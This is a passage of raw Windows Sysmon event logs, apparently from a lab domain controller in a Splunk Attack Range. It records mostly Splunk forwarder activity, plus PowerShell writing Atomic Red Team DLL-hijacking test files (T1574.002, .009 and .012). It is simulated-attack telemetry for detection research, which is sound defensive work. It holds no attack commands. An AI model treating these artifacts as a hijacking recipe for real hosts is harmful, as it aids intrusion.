Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.546{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000024544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\src\atomicNotepad.sln2021-06-23 21:08:55.513 11241100x800000000000000024543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:55.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\bin\T1574.012x64.dll2021-06-23 21:08:55.482 
23542300x800000000000000024542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.482{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADF16F95C2B029BACD32657D15B8049,SHA256=D982164B7C7DA916BD0580DE67D758B3F511B670044B578EDE50EF52E98F13D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.435{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8A559B0E6CD82F43A41A791418F3C91,SHA256=67CCA9395BEE9AE88F9F07C5B7A60877F3CEE96D1725F73CE872D772BEED8E67,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:55.357{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.009\bin\WindowsServiceExample.exe2021-06-23 21:08:55.357 23542300x800000000000000024539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.185{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1AC6445ACED2C235776A4B8CCA3B00D8,SHA256=8CFACE90189749842AC35BDCAA5514A4FF41E2B3123B860867B534ACB2006B79,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:08:55.170{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.002\bin\libcurl.dll2021-06-23 21:08:55.170 11241100x800000000000000024537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:55.138{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.002\bin\GUP.exe2021-06-23 21:08:55.138 23542300x800000000000000024611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.966{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=141CF113BA63589A6C4E3CF18B7B7B13,SHA256=ED8C61E81FF757CACACC977BAE0F767166EB77CB089780BA53184FEA0D8657C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E8-60D3-2206-00000000CF01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:59.591{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.592{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.761{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02BB163634050013EF2B59A662C275E7,SHA256=B46464DB2901418698FB3DB38171DD83D3EBAE447680E3CB4FCB8A4B97C3A035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.736{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D3DD141F8D766FB0C3712967E158CD,SHA256=ACF52FF67BDA300389E0DDC19EC685E6B817BE19E697107F4F6C7F3DABD9AE17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:01.748{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38814B29284D23AB16AFD2F90EB7BE4,SHA256=C081827155B2550E0D25F08EBDE0FC180216382C12A5934E940F89B2FB780C42,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:02.765{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B8BBC339CA067FC7238CC80AC75114,SHA256=5B7B58EF7D7411D62EE7F5D4FDF13177C346F03FA40A7D93D2C2A519584BA040,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.198{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-663.attackrange.local138netbios-dgm 354300x800000000000000024638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.198{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-663.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x800000000000000024641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:03.797{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4047C8DB09BCD2370709C315E9AC804F,SHA256=2A822D5F2DA5984AD585F1D6D65A20E30549CFC61F807CE7C932314C45DBBD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:04.797{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B082D4BDF94ADA59F7FC31C81BC7985,SHA256=A361DA4E92135F635DCEF6C09252B2DB52A217BFCFBE0F670074F592CFE83A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:05.844{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D3A6BDF60EA92CB472A96D2D7F1DE7,SHA256=5143941D6F288310884EF927AB25DECBC8CEA51D5A66D067A9B5A948D73C49D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:06.844{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D0CE8BD02333B4AB2F1A8F81CB18A9,SHA256=A4F23EA2DEEA4EAC796306D56F54D6B050FA77A30EB66979DEC6493BF1D0F891,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:04.258{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61511-false10.0.1.12-8000- 23542300x800000000000000024646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:07.859{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A66AABAD5AFBB0F06EEC71C45EFB3E,SHA256=86E6429D0D1BA61CDA262CCAEBAC0E3A97D2B7B055680EF8AF367D1D15CC0B9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:08.875{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FA0E43B25BEF236834D034E8F927F9B,SHA256=4A252E14CABFB7650CFDDB48857815B37422F2BFB76B46BBD5D4247BF6FF48EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:09.875{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=543804470443691322321526EA5B7959,SHA256=401531FCF792DE3CDD072D930AE20C8D1579BA17F16E498C745DE0DDE8566AF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:10.883{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D5A05CD7EE56F2ADF1FF5589140B04,SHA256=272ED5315676A4787B226A33F84C1C0901565C15DC7DBB909AFA6CFE1B08D929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:11.883{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CCB06D0E579817D756BDC1106197FDC,SHA256=49F87034A4989FEB5ED4DA0A483BF15B200C78F33B12BF0A8068506D8F8B5018,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:10.148{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61512-false10.0.1.12-8000- 23542300x800000000000000024652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:12.898{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BA5C8123893CF023B7817006FA75CCD,SHA256=CE6AC2D1AB3C48C4186C7606CA18810293C6B4B976D420A615979B8FD920E661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:13.914{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754B364EE577CAE31528ADF09ABB5CFA,SHA256=D195FA48AF2B393353179D79EB9BA56DB3ED5353CEAB41DBD9593E7FCD8F7D18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
